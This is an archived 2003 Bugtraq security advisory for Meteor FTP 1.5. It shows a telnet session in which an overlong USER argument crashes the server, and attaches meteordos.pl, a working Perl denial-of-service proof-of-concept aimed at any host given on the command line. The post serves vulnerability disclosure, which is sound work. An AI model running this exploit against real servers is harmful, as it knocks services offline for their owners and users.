109156 2003-08-09 20:39 /76 rader/ Zee <zerash@evicted.org>
Importerad: 2003-08-09 20:39 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5944>
Ärende: Remote denial of service vulnerability in Meteor FTP Version 1.5
------------------------------------------------------------
www.evicted.org
zerash@evicted.org
August 8, 2003
Meteor FTP Version 1.5 Remote Denial of Service Vulnerability
1. Introduction
----------------
Meteor FTP is a personal ftp server that runs on Windows98/ME/2K/XP.
2. Vulnerability
-----------------
A vulnerability exists in Meteor FTP Version 1.5, which allows any
malicious user to remotely cause a denial of service against the ftp
server.
By connecting to the Meteor FTP server and issuing USER followed by
large amounts of data, the ftp server will crash.
3. Example
-----------
Proof of concept exploit (meteordos.pl) is included in the attachment.
root@openwire # telnet 192.168.1.14 21
Trying 192.168.1.14...
Connected to 192.168.1.14.
Escape character is '^]'.
220 Service ready for new user
USER
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
530 Not logged on
QUIT
Connection closed by foreign host.
root@openwire # telnet 192.168.1.14 21
Trying 192.168.1.14...
Connected to 192.168.1.14.
Escape character is '^]'.
USER anonymous
QUIT
telnet> quit
Connection closed.
At this point the server has completely froze up. On the server side,
the Meteor FTP spits out a dialog :
"Error: Access Violation at 0x77FCC992 (Tried to write 0x25252525),
program terminated."
By clicking "OK", Meteor FTP terminates.
4. Vendor status
----------------
Vendor has been notified, waiting for response...
5. Credits
-----------
Vulnerability & code by zerash
You can view this advisory at :
http://www.evicted.org/projects/writings/mftpadvisory.txt
You can view the exploit at :
http://www.evicted.org/projects/code/meteordos.pl
6. Contact
-----------
Please send suggestions, updates, and comments to :
zerash@evicted.org
http://www.evicted.org
(109156) /Zee <zerash@evicted.org>/-------(Ombruten)
Bilaga (text/plain) i text 109157
109157 2003-08-09 20:39 /33 rader/ Zee <zerash@evicted.org>
Bilagans filnamn: "meteordos.pl"
Importerad: 2003-08-09 20:39 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5945>
Bilaga (text/plain) till text 109156
Ärende: Bilaga (meteordos.pl) till: Remote denial of service vulnerability in Meteor FTP Version 1.5
------------------------------------------------------------
#!/usr/bin/perl
#
# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5
#
# A vulnerability has been identified in Meteor FTP Version 1.5, which
# allows malicious users to remotely crash the ftpd. By connecting to the
# ftpd and issuing USER followed by large amounts of data, the server
# crashes. For more info, go to :
# http://www.evicted.org/projects/writings/mftpadvisory.txt
#
# Usage : ./meteordos.pl <host/ip>
#
# Vulnerability & code by zerash
# Contact : zerash@evicted.org
use Net::FTP;
$host = $ARGV[0];
if("$ARGV[0]" eq "") {
print("DoS against Meteor FTP Version 1.5 by zerash\@evicted.org\n");
die("Usage : ./meteorftpdos <host\/ip>\n");
} else {
print("Connecting to $host...\n"); my $ftp =
Net::FTP->new($host) or die "Couldn't connect to $host\n";
print("Connected!\n"); print("Attempting to exploit the
ftpd...");
$ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');
$ftp->quit;
print("Success!\n");
}
(109157) /Zee <zerash@evicted.org>/-------(Ombruten)